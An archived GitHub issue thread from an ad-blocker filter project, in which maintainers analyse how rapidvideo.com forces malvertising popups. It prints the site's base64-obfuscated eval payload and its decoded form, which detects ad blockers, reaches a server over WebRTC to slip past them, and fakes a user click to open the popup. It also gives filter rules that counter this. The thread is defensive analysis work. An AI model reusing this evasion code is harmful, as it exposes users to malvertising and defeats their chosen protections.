Skip to content
This repository has been archived by the owner on Oct 15, 2020. It is now read-only.

rapidvideo.com #246

Closed
ale5000-git opened this issue May 30, 2017 · 28 comments
Closed

rapidvideo.com #246

ale5000-git opened this issue May 30, 2017 · 28 comments
Labels
Archived This thread was archived, open new issues for similar problems. Fixed

Comments

@ale5000-git
Copy link

ale5000-git commented May 30, 2017

It open a popup with ads.

Test link: This cannot be sent publicly.
Please tell me another way to send it.

The popup appears only when you hit the play button.

I have fixed it with this:
||35.184.169.188^$popup
it would be nice if it is included (this or a more generic one if you find it).

@jspenguin2017
Copy link
Owner

jspenguin2017 commented May 30, 2017

Popup cannot be reproduced on the home page, I need a test link to implement a fix.

You can either open an issue in our restricted issues tracker (don't forget to flag it as confidential), or submit a message to https://jspenguin.com/PrivateMessage with reference 246.

Update: Message received, it is posted to GitLab so it won't be lost. I am the only one who can see that issue. https://gitlab.com/xuhaiyang1234/uBlockProtectorSecretIssues/issues/3

@ale5000-git
Copy link
Author

ale5000-git commented May 30, 2017

I have sent a private message, you just need to open the link and hit play to see the popup.

@jspenguin2017
Copy link
Owner

Thanks, I received it. I'll have a look.

@jspenguin2017
Copy link
Owner

jspenguin2017 commented May 30, 2017

The popup is probably somewhere here, I'm not sure how long that rule can last as changing IP is rather trivial...
image

Update: after some tests, it can be narrowed down to inline script.

@jspenguin2017
Copy link
Owner

jspenguin2017 commented May 30, 2017

Found the code that is responsible for it... It uses WebRTC to retrieve data to bypass ad blockers... Well, let's just remove window.atob so it can't decode the payload 😆

(function(){if (window.atob) { eval(window.atob('d2luZG93LkNTU1ZpZXdwb3J0UnVsZXMgPSB0cnVlOyhmdW5jdGlvbihkb2N1bWVudCwgc2NyaXB0RWxlbWVudCwgZmlyc3RTY3JpcHQpIHtzY3JpcHRFbGVtZW50ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7c2NyaXB0Q0ZBU3luYyA9IGRvY3VtZW50LmNyZWF0ZUF0dHJpYnV0ZSgiZGF0YS1jZmFzeW5jIik7c2NyaXB0Q0ZBU3luYy52YWx1ZSA9IGZhbHNlO3NjcmlwdEVsZW1lbnQuc2V0QXR0cmlidXRlTm9kZShzY3JpcHRDRkFTeW5jKTtzY3JpcHRFbGVtZW50LnNyYyA9ICcvL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9qcy9hZHNieWdvb2dsZS5qcyc7c2NyaXB0RWxlbWVudC5vbmVycm9yID0gZnVuY3Rpb24gKCkgeyB3aW5kb3cuQ1NTVmlld3BvcnRSdWxlcz1mYWxzZTsgfTsgdmFyIGZpcnN0U2NyaXB0O2lmICh0eXBlb2YgZG9jdW1lbnQuc2NyaXB0cyAhPT0gJ3VuZGVmaW5lZCcpIHsgZmlyc3RTY3JpcHQgPSBkb2N1bWVudC5zY3JpcHRzWzBdOyB9IGlmICh0eXBlb2YgZmlyc3RTY3JpcHQgPT0gJ3VuZGVmaW5lZCcpIHsgZmlyc3RTY3JpcHQgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnc2NyaXB0JylbMF07IH0gZmlyc3RTY3JpcHQucGFyZW50Tm9kZS5pbnNlcnRCZWZvcmUoc2NyaXB0RWxlbWVudCwgZmlyc3RTY3JpcHQpOyB9KGRvY3VtZW50KSk7CihmdW5jdGlvbigpeyB2YXIgd2FzX2luaXQgPSBmYWxzZTsgZnVuY3Rpb24gaW5pdF9teXNjcmlwdCgpIHsgaWYgKHdhc19pbml0KSByZXR1cm4gOyB3YXNfaW5pdCA9IHRydWU7IHZhciBjPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImRpdiIpO2MuaW5uZXJIVE1MPSImbmJzcDsiO2MuY2xhc3NOYW1lPSJhZHNib3giO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYyk7d2luZG93LnNldFRpbWVvdXQoZnVuY3Rpb24oKXtpZigwPT09Yy5vZmZzZXRIZWlnaHR8fHdpbmRvdy5DU1NWaWV3cG9ydFJ1bGVzPT09ZmFsc2Upe3ZhciBsPTAsZD1uZXcgKHdpbmRvdy5SVENQZWVyQ29ubmVjdGlvbnx8d2luZG93Lm1velJUQ1BlZXJDb25uZWN0aW9ufHx3aW5kb3cud2Via2l0UlRDUGVlckNvbm5lY3Rpb24pKHtpY2VTZXJ2ZXJzOlt7dXJsOiJzdHVuOjE3NTUwMDE4MjY6NDQzIn1dfSx7b3B0aW9uYWw6W3tSdHBEYXRhQ2hhbm5lbHM6ITB9XX0pO2Qub25pY2VjYW5kaWRhdGU9ZnVuY3Rpb24oYil7dmFyIGU9IiI7IWIuY2FuZGlkYXRlfHwoYi5jYW5kaWRhdGUgJiYgYi5jYW5kaWRhdGUuY2FuZGlkYXRlLmluZGV4T2YoJ3NyZmx4JykgPT0gLTEpfHwhKGI9LyhbMC05XXsxLDN9KFwuWzAtOV17MSwzfSl7M318W2EtZjAtOV17MSw0fSg6W2EtZjAtOV17MSw0fSl7N30pLy5leGVjKGIuY2FuZGlkYXRlLmNhbmRpZGF0ZSlbMV0pfHwKbXx8Yi5tYXRjaCgvXigxOTJcLjE2OFwufDE2OVwuMjU0XC58MTBcLnwxNzJcLigxWzYtOV18MlxkfDNbMDFdKSkvKXx8Yi5tYXRjaCgvXlthLWYwLTldezEsNH0oOlthLWYwLTldezEsNH0pezd9JC8pfHwobT0hMCxlPWIsZG9jdW1lbnQub25jbGljaz1mdW5jdGlvbigpe2N1cnJlbnRfY291bnQ9cGFyc2VJbnQoKGRvY3VtZW50LmNvb2tpZS5tYXRjaCgibm9wcnBobGJmbWR3dGdpc3pjbnQ9KFteO10uKz8pKDt8JCkiKXx8W10pWzFdfHwwKTtpZighbCYmMjE0NzQ4MzY0Nj5jdXJyZW50X2NvdW50KXtsPTE7dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiYSIpLGI9TWF0aC5mbG9vcigxRTEyKk1hdGgucmFuZG9tKCkpLGY9TWF0aC5yYW5kb20oKS50b1N0cmluZygzNikucmVwbGFjZSgvW15hLXpBLVowLTldKy9nLCIiKS5zdWJzdHIoMCwxMCk7YS5ocmVmPSJodHRwOi8vIitlKyIvIituLmVuY29kZShiKyIvIisoMTU1NzAxNytiKSsiLyIrZik7YS50YXJnZXQ9Il9ibGFuayI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTsKYj1uZXcgTW91c2VFdmVudCgiY2xpY2siLHt2aWV3OndpbmRvdyxidWJibGVzOiExLGNhbmNlbGFibGU6ITF9KTthLmRpc3BhdGNoRXZlbnQoYik7YS5wYXJlbnROb2RlLnJlbW92ZUNoaWxkKGEpO2E9bmV3IERhdGU7YS5zZXRUaW1lKGEuZ2V0VGltZSgpKzg2NDAwMDAwKTtiX2RhdGU9KGV4aXN0aW5nX2RhdGU9dW5lc2NhcGUoKGRvY3VtZW50LmNvb2tpZS5tYXRjaCgibm9wcnBobGJmbWR3dGdpc3pleHA9KFteO10uKz8pKDt8JCkiKXx8W10pWzFdfHwiIikpP2V4aXN0aW5nX2RhdGU6YS50b0dNVFN0cmluZygpO2E9IjsgZXhwaXJlcz0iK2JfZGF0ZTtkb2N1bWVudC5jb29raWU9Im5vcHJwaGxiZm1kd3RnaXN6Y250PSIrKGN1cnJlbnRfY291bnQrMSkrYSsiOyBwYXRoPS8iO2RvY3VtZW50LmNvb2tpZT0ibm9wcnBobGJmbWR3dGdpc3pleHA9IitiX2RhdGUrYSsiOyBwYXRoPS8ifX0pfTtkLmNyZWF0ZURhdGFDaGFubmVsKCIiKTtkLmNyZWF0ZU9mZmVyKGZ1bmN0aW9uKGIpe2Quc2V0TG9jYWxEZXNjcmlwdGlvbihiLGZ1bmN0aW9uKCl7fSxmdW5jdGlvbigpe30pfSwKZnVuY3Rpb24oKXt9KX1NYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5yZXBsYWNlKC9bXmEtekEtWjAtOV0rL2csIiIpLnN1YnN0cigwLDEwKTt2YXIgbT0hMSxuPXtfMDoiQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLz0iLGVuY29kZTpmdW5jdGlvbihiKXtmb3IodmFyIGU9IiIsYSxjLGYsZCxrLGcsaD0wO2g8Yi5sZW5ndGg7KWE9Yi5jaGFyQ29kZUF0KGgrKyksYz1iLmNoYXJDb2RlQXQoaCsrKSxmPWIuY2hhckNvZGVBdChoKyspLGQ9YT4+MixhPShhJjMpPDw0fGM+PjQsaz0oYyYxNSk8PDJ8Zj4+NixnPWYmNjMsaXNOYU4oYyk/az1nPTY0OmlzTmFOKGYpJiYoZz02NCksZT1lK3RoaXMuXzAuY2hhckF0KGQpK3RoaXMuXzAuY2hhckF0KGEpK3RoaXMuXzAuY2hhckF0KGspK3RoaXMuXzAuY2hhckF0KGcpO3JldHVybiBlfX19LDQwMCkgfSBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCJET01Db250ZW50TG9hZGVkIiwgZnVuY3Rpb24gKCkgeyBpbml0X215c2NyaXB0KCk7IH0gKTsgd2luZG93LnNldFRpbWVvdXQoaW5pdF9teXNjcmlwdCwgMTIwKSB9KSgpOw==')) } })();

@jspenguin2017
Copy link
Owner

The decoded payload:

window.CSSViewportRules = true;
(function(document, scriptElement, firstScript) {
    scriptElement = document.createElement('script');
    scriptCFASync = document.createAttribute("data-cfasync");
    scriptCFASync.value = false;
    scriptElement.setAttributeNode(scriptCFASync);
    scriptElement.src = '//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js';
    scriptElement.onerror = function() {
        window.CSSViewportRules = false;
    };
    var firstScript;
    if (typeof document.scripts !== 'undefined') {
        firstScript = document.scripts[0];
    }
    if (typeof firstScript == 'undefined') {
        firstScript = document.getElementsByTagName('script')[0];
    }
    firstScript.parentNode.insertBefore(scriptElement, firstScript);
}(document));
(function() {
    var was_init = false;

    function init_myscript() {
        if (was_init) return;
        was_init = true;
        var c = document.createElement("div");
        c.innerHTML = " ";
        c.className = "adsbox";
        document.body.appendChild(c);
        window.setTimeout(function() {
            if (0 === c.offsetHeight || window.CSSViewportRules === false) {
                var l = 0,
                    d = new(window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)({
                        iceServers: [{
                            url: "stun:1755001826:443"
                        }]
                    }, {
                        optional: [{
                            RtpDataChannels: !0
                        }]
                    });
                d.onicecandidate = function(b) {
                    var e = "";
                    !b.candidate || (b.candidate && b.candidate.candidate.indexOf('srflx') == -1) || !(b = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(b.candidate.candidate)[1]) ||
                        m || b.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/) || b.match(/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$/) || (m = !0, e = b, document.onclick = function() {
                            current_count = parseInt((document.cookie.match("noprphlbfmdwtgiszcnt=([^;].+?)(;|$)") || [])[1] || 0);
                            if (!l && 2147483646 > current_count) {
                                l = 1;
                                var a = document.createElement("a"),
                                    b = Math.floor(1E12 * Math.random()),
                                    f = Math.random().toString(36).replace(/[^a-zA-Z0-9]+/g, "").substr(0, 10);
                                a.href = "http://" + e + "/" + n.encode(b + "/" + (1557017 + b) + "/" + f);
                                a.target = "_blank";
                                document.body.appendChild(a);
                                b = new MouseEvent("click", {
                                    view: window,
                                    bubbles: !1,
                                    cancelable: !1
                                });
                                a.dispatchEvent(b);
                                a.parentNode.removeChild(a);
                                a = new Date;
                                a.setTime(a.getTime() + 86400000);
                                b_date = (existing_date = unescape((document.cookie.match("noprphlbfmdwtgiszexp=([^;].+?)(;|$)") || [])[1] || "")) ? existing_date : a.toGMTString();
                                a = "; expires=" + b_date;
                                document.cookie = "noprphlbfmdwtgiszcnt=" + (current_count + 1) + a + "; path=/";
                                document.cookie = "noprphlbfmdwtgiszexp=" + b_date + a + "; path=/"
                            }
                        })
                };
                d.createDataChannel("");
                d.createOffer(function(b) {
                        d.setLocalDescription(b, function() {}, function() {})
                    },
                    function() {})
            }
            Math.random().toString(36).replace(/[^a-zA-Z0-9]+/g, "").substr(0, 10);
            var m = !1,
                n = {
                    _0: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
                    encode: function(b) {
                        for (var e = "", a, c, f, d, k, g, h = 0; h < b.length;) a = b.charCodeAt(h++), c = b.charCodeAt(h++), f = b.charCodeAt(h++), d = a >> 2, a = (a & 3) << 4 | c >> 4, k = (c & 15) << 2 | f >> 6, g = f & 63, isNaN(c) ? k = g = 64 : isNaN(f) && (g = 64), e = e + this._0.charAt(d) + this._0.charAt(a) + this._0.charAt(k) + this._0.charAt(g);
                        return e
                    }
                }
        }, 400)
    }
    document.addEventListener("DOMContentLoaded", function() {
        init_myscript();
    });
    window.setTimeout(init_myscript, 120)
})();

@ale5000-git
Copy link
Author

Thanks.

@uBlock-user
Copy link

Killing eval should patch it too.

@jspenguin2017
Copy link
Owner

Yea, there are many things we can do.

Pretty nasty code, goes right through uBO and retrieve malvertizing popup link. Also use MouseEvent to make the popup being treated as a link click.

@uBlock-user
Copy link

Yes, these days they're making the popups appear as hyper-links.

@uBlock-user
Copy link

Test link for any further investigation - https://www.rapidvideo.com/embed/FEXYFN0CJO

@jspenguin2017
Copy link
Owner

jspenguin2017 commented May 30, 2017

Chromium should tell extension if MouseEvent is used, so extensions can know if the popup is a real click or it's a real click but could be baited.

Oh, good, I also have another link recorded privately so they can't just revoke the link.

@uBlock-user
Copy link

uBlock-user commented May 30, 2017

It should be passed through WebRequest API otherwise uBO or any such extension will never know. WebRTC still doesn't pass through WebRequest API and goes undetected as of Chromium 60.

@jspenguin2017
Copy link
Owner

jspenguin2017 commented May 30, 2017

As far as I know, WebRTC uses a special binary plugin, and requests do not go through WebRequest, the log is available at chrome://webrtc-internals/ so I guess Chromium can make a RCTRequest or something... The URL is very different, in this case, the server is stun:1755001826:443 so I guess it's not appropriate to put it together with WebRequest.

I think uBO has a workaround that patches RTCPeerConnection, but I think the patching is not done everywhere by default.

@jspenguin2017
Copy link
Owner

I still need to read over uBO and VM source code... I guess I need to know how uBO and VM works to properly manage this project. Chrome is properly documented so that's fine.

@uBlock-user
Copy link

Actually it's supposed to go there as it's making a network connection behind-the-scene - w3c/webappsec-csp#92

@uBlock-user
Copy link

uBlock-user commented May 30, 2017

uBO's workaround has already been worked-around by numerous websites so it's no longer used. Right now uBO-Extra is being used to kill it with $websocket

@jspenguin2017
Copy link
Owner

You can just nuke those two properties from window on a per domain basis. It's not hard to completely kill it.

@uBlock-user
Copy link

Yeah ofcourse if they're using any such window properties, then that works.

@jspenguin2017
Copy link
Owner

Huh, you mean they grab another window from iframe? Hum...

@ale5000-git
Copy link
Author

ale5000-git commented May 30, 2017

@jspenguin2017: On my link it is fixed but on the link provided by @uBlock-user if you reload the page sometimes, there is one time where the ads/malware bypass the block.

@jspenguin2017
Copy link
Owner

jspenguin2017 commented May 30, 2017

@ale5000-git OK, I see, race condition... Time to bring in noeval.js.

@jspenguin2017
Copy link
Owner

jspenguin2017 commented May 30, 2017

How come uBlock Origin can win the race... when uBlock Protector runs, it should be synchronous and blocks further parsing until it is ready...
I guess I have to read VM code to find out... Maybe it's asynchronous...

@jspenguin2017
Copy link
Owner

This should patch it for good.

@ale5000-git
Copy link
Author

ale5000-git commented May 30, 2017

Unfortunately sometimes it is still able to open a popup.
With the latest version is it even more frequent.

@jspenguin2017
Copy link
Owner

jspenguin2017 commented May 30, 2017

Maybe it's still using cache, can you try to manually add this rule to uBlock Origin?
rapidvideo.com##script:inject(noeval.js)

I'm not getting popups anymore.

@ale5000-git
Copy link
Author

ale5000-git commented May 30, 2017

Sorry, it is as you said.
Put it manually fixed it.

Then I have removed the manual rule, cleaned uBlock cache and browser cache and the problem is still fixed.

@jspenguin2017
Copy link
Owner

jspenguin2017 commented Jun 7, 2017

@github-actions github-actions bot added the Archived This thread was archived, open new issues for similar problems. label Aug 21, 2020
@github-actions github-actions bot locked and limited conversation to collaborators Aug 21, 2020
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
Archived This thread was archived, open new issues for similar problems. Fixed
Projects
None yet
Development

No branches or pull requests

3 participants